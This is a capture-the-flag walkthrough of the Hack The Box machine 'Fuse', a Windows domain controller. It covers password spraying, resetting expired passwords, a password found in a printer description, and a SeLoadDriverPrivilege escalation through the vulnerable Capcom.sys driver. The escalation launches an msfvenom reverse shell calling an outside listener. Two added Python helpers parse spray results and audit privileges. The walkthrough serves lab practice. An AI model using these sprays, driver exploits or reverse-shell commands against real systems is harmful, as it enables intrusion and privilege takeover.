Fuse HTB
IP: 10.10.10.193
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.193 | cut -d"/" -f1 | tr '\n' ','
results
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708
Let's run a more in-depth scan of the target:
sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708 -oA tcp_ports 10.10.10.193
results
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-07T23:37:32
|_ start_date: 2024-01-07T23:30:39
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds
What we can see:
- most likely a domain controller, given the presence of DNS, Kerberos, LDAP etc.
- Windows Server 2016
- domain name: fabricorp.local
- host name: FUSE
We can add the domain and host name to our hosts file.
Let's see if we can perform a zone transfer, since port 53 (DNS) is open:
dig @10.10.10.193 fabricorp.local AXFR
No luck
Let's test the services for anonymous authentication:
SMB
crackmapexec smb 10.10.10.193 -u anonymous -p ''
No luck
LDAP
ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC=local" "(objectClass=person)"
No luck
RPC
rpcclient -N -U anonymous 10.10.10.193
No luck
Let's try the web server
When we try to navigate to http://fabricorp.local we are redirected to http://fuse.fabricorp.local/papercut/logs/html/index.htm, so let's add the subdomain fuse.fabricorp.local to our hosts file.
When we do and try to access the page again we can see the following

Looking at the print logs we can see a couple of usernames on the system:
pmerton
tlavel
sthompson
bhult
administrator
Other than usernames I can't really find any other pieces of interesting information, and we need a set of working creds to progress, so we can use cewl to build a wordlist to try against the usernames we have found.
Building a wordlist
cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers --depth 4 > pass_lists.txt
Now that we have a list of usernames and a list of possible passwords, let's perform some password spraying via SMB:
crackmapexec smb 10.10.10.193 -u usernames.txt -p pass_lists.txt
we do see something interesting

We have
tlavel:Fabricorp01
bhult:Fabricorp01
but it looks like the passwords have expired. I tried to authenticate to a few services, but no luck.
If we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE, meaning we do have valid credentials but they are expired. We could try and reset the password using a tool like smbpasswd:
impacket-smbpasswd fabricorp/tlavel:Fabricorp01@10.10.10.193 -newpass shrek123!
The new password has to satisfy the domain's password complexity requirements; shrek123! does.
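Reading the spray results by status, as an added Python example that is not part of the original writeup: it groups every attempted credential by crackmapexec's result marker and NTSTATUS code, treating STATUS_PASSWORD_MUST_CHANGE as a correct password on an expired account, exactly as reasoned above. The sample output is constructed in the tool's usual layout, since the post only shows the real output as a screenshot.

```python
import re
from collections import defaultdict

# Constructed sample of crackmapexec SMB spray output in the tool's usual layout
# (not the box's real output, which the post only shows as a screenshot).
SPRAY_OUTPUT = """\
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [+] fabricorp.local\\svc-print:$fab@s3Rv1ce$1 
"""

# protocol, host, port, hostname, [marker], DOMAIN\user:password, optional NTSTATUS code
LINE_RE = re.compile(
    r"^\S+\s+(?P<host>\S+)\s+\d+\s+\S+\s+\[(?P<mark>[-+])\]\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_\w+))?"
)

def triage_spray(output):
    """Group each attempted credential by outcome.

    Returns a dict with the keys 'valid', 'must_change' and 'failed' (only the
    ones that occur); each value is a list of (user, password) tuples. A [-]
    line carrying STATUS_PASSWORD_MUST_CHANGE is a correct password on an
    account whose password has expired, so it is kept separate from failures.
    """
    buckets = defaultdict(list)
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:  # banner / info lines carry no user:password pair
            continue
        cred = (m["user"], m["password"])
        if m["mark"] == "+":
            buckets["valid"].append(cred)
        elif m["status"] == "STATUS_PASSWORD_MUST_CHANGE":
            buckets["must_change"].append(cred)
        else:
            buckets["failed"].append(cred)
    return dict(buckets)

if __name__ == "__main__":
    for outcome, creds in triage_spray(SPRAY_OUTPUT).items():
        print(outcome, creds)
```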
It seems the password expires one minute after creation, so what we can do is write a basic Python script that automates the password change process:
#!/usr/bin/env python3
import subprocess
import random
import string

def gen_password(length=9):
    # Build a password that meets the default Windows complexity policy by
    # guaranteeing one character from each class (upper, lower, digit, symbol)
    pools = [string.ascii_uppercase, string.ascii_lowercase, string.digits, string.punctuation]
    # Start with a letter so the value can never be mistaken for a command-line option
    first = random.choice(string.ascii_letters)
    rest = [random.choice(pool) for pool in pools]
    rest += [random.choice(''.join(pools)) for _ in range(length - len(pools) - 1)]
    random.shuffle(rest)
    return first + ''.join(rest)

def grab_it_all():
    new_password = gen_password()
    # The arguments are passed as a list (no shell), so the password needs no
    # quoting or escaping; escaping it would change the password that gets set
    change_pass = [
        '/usr/bin/impacket-smbpasswd',
        'fabricorp/tlavel:Fabricorp01@10.10.10.193',
        '-newpass',
        new_password
    ]
    try:
        # Run the command; check=True raises CalledProcessError on a non-zero exit code
        result = subprocess.run(change_pass, check=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, text=True)
        # Success: print the password we just set so we can use it right away
        print(new_password)
    except subprocess.CalledProcessError as e:
        # The exception carries the captured output; 'result' is never assigned on failure
        print(f'The following error has occurred: {e}')
        print(f'Command output: {e.stdout}{e.stderr}')

if __name__ == '__main__':
    grab_it_all()
Now that we have our automation script, we can continue enumerating.
Let's create a new password:
./smbpasswd.py

Now let's use crackmapexec to list all the shares:
crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' --shares
For good measure we will also use the spider_plus module and see if we can find anything interesting:
crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' -M spider_plus
Nothing too interesting within SMB, so let's head over to RPC:
rpcclient -U fabricorp/tlavel 10.10.10.193
When we enumerate domain users we can see the following:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
Since the web site showed printing information, a good place to start enumerating would be the printers:
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
Looks like we could have a possible password:
scan2docs: $fab@s3Rv1ce$1
Looks like creds for the HP-MFT01 SMB share
crackmapexec smb 10.10.10.193 -u scan2docs -p '$fab@s3Rv1ce$1'
Doesn't authenticate

Let's perform some password spraying using the recently found usernames.
First let's clean them up (the enumdomusers output above was saved to a file named usernames):
sed -n 's/user:\[\(.*\)\] rid:.*/\1/p' usernames > cleaned_usernames.txt
Let's use crackmapexec to perform the password spraying:
crackmapexec smb 10.10.10.193 -u cleaned_usernames.txt -p '$fab@s3Rv1ce$1'
And we can see we have some valid creds

svc-print: $fab@s3Rv1ce$1
Let's list the shares we have access to:
crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' --shares

Let's use the spider_plus module and see if we have access to anything interesting:
crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' -M spider_plus
Nothing interesting
Let's see if we can WinRM into the machine:
evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
We have a shell on the system

Now that we have a session on the target, let's see if we can enumerate LDAP with bloodhound-python and get some info on the domain:
bloodhound-python -c all -d fabricorp.local -u svc-print -p '$fab@s3Rv1ce$1' -ns 10.10.10.193
Let's start neo4j:
sudo neo4j console
Log in, then start BloodHound:
bloodhound --no-sandbox
Now we can ingest all the information we collected with bloodhound-python.
I don't really find much interesting.
If we look at our current privileges on the machine we can see something interesting

We can see we have SeLoadDriverPrivilege enabled for our current user, which essentially allows us to load a driver into the kernel.
How can we exploit this?
Essentially, since we have SeLoadDriverPrivilege we are able to load a vulnerable driver and then exploit said driver; this post explains this better
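An added Python example (not from the writeup) for the other side of this step: it parses the output of whoami /priv and flags the privileges a least-privilege review of a service account should question. SeLoadDriverPrivilege is the one this box hinges on; the other entries in the audit list and the sample output are my own additions, not taken from the post.

```python
import re

# Privileges worth flagging during an account audit, with the reason each one
# matters. SeLoadDriverPrivilege is the one this box hinges on; the rest is an
# added short list of well-known equivalents, not something the writeup covers.
SENSITIVE_PRIVILEGES = {
    "SeLoadDriverPrivilege": "can load kernel drivers (kernel code execution)",
    "SeDebugPrivilege": "can open and tamper with any process",
    "SeImpersonatePrivilege": "can impersonate other users' tokens",
    "SeBackupPrivilege": "can read any file regardless of its ACL",
    "SeRestorePrivilege": "can write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "can take ownership of any securable object",
}

# Constructed sample in the layout 'whoami /priv' prints (not a capture from the box).
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# privilege name, free-text description, then the State column
PRIV_RE = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Return {privilege_name: True if Enabled else False} from 'whoami /priv' output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line)
        if m:
            privs[m.group(1)] = (m.group(3) == "Enabled")
    return privs

def audit_privileges(text):
    """List (privilege, state, reason) for every sensitive privilege the token holds.

    A privilege shown as Disabled is still held by the token (a process can
    enable it with AdjustTokenPrivileges), so both states are reported.
    """
    privs = parse_privileges(text)
    return [(name, "Enabled" if privs[name] else "Disabled", SENSITIVE_PRIVILEGES[name])
            for name in privs if name in SENSITIVE_PRIVILEGES]
```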
We can use the following vulnerable driver
Let's walk through the steps needed to compile, load, and exploit the driver using SeLoadDriverPrivilege
We will need to compile a few .exe files for the following attack; the best way to compile .exe files is in a Windows VM. To load the vulnerable driver Capcom.sys we will use the following tool from Tarlogic Security: https://github.com/TarlogicSecurity/EoPLoadDriver/
git clone https://github.com/TarlogicSecurity/EoPLoadDriver.git
After we have downloaded the tool (essentially a single C++ file), let's start a new project in Visual Studio; in the project window we choose the C++ Console App.
Note: when creating a new project and specifying the "Console App" project template you may run into an error; to fix this, go to the Visual Studio Installer

click 'Modify' and install the 'Desktop development with C++' workload

After this is installed we should be able to select the Console App template without error.
Alright, back to compiling EoPLoadDriver.cpp.
Let's start a new project

Click 'Next'
In the next window we can specify the name of our new project

Here we can specify the name of the project (you can name it whatever you want)
Looking in the project we can see a basic hello world program

Now we can replace that code with the EoPLoadDriver.cpp code below
After we have copied and pasted the code, we can set the project to 'Release' and 'x64'

then we select 'Build' -> 'Build Solution'
Note: we receive an error on the line
#include "stdafx.h"
We can just remove it and it will build.
Now we should be able to see the .exe file within the specified file path

Now we can transfer this over to our Linux machine. For this I will start a Python HTTP server on my Windows machine:
python.exe -m http.server 80
From our Linux machine:
wget http://<windows_ip>/EoPLoadDriver.exe
Now we can upload it to the target machine from the evil-winrm session:
upload EoPLoadDriver.exe
We also need to upload Capcom.sys:
upload Capcom.sys
Now that we have the vulnerable driver and the loader on the target machine, we can run the same command we saw in the blog post:
.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys
We can see the following

It looks like it worked (no error), but we don't have the permissions to check whether the driver is actually running.
Next we need to build the actual exploit for our vulnerable driver; we can use the following code
Since this is a .sln file we will need to use Visual Studio on our Windows machine; after we have cloned the repo we can simply double-click the ExploitCapcom.sln file.
Let's build the project to see if any errors occur before we modify the code

No errors, so we are ready to modify the code slightly. If we look at the LaunchShell function we can see the following:
// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
                       CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
                       &ProcessInfo))
    {
        return false;
    }
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}
This just opens a cmd prompt, but since we only have remote access to the machine this is pretty pointless. What we will do is generate a reverse shell with msfvenom and drop that on the system; instead of the function executing cmd.exe we are going to make it execute shrek123.exe, our reverse shell. So we want to change one line in the code:
// Launches our reverse shell instead of cmd.exe
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\ProgramData\\shrek123.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
                       CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
                       &ProcessInfo))
    {
        return false;
    }
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}
Now we can build the executable, just like we did with the loader.
Let's download this onto our Linux host, same as before with a Python HTTP server.
Let's generate our reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.22 LPORT=9001 -f exe -o shrek123.exe
Let's upload both files:
upload shrek123.exe
upload ExploitCapcom.exe
Start a listener:
rlwrap -cAr nc -lvnp 9001
Let's execute the exploit.
Note: you may have to run the following again before executing the exploit:
.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys
Now execute the exploit:
.\ExploitCapcom.exe
If we check our listener we should have a shell
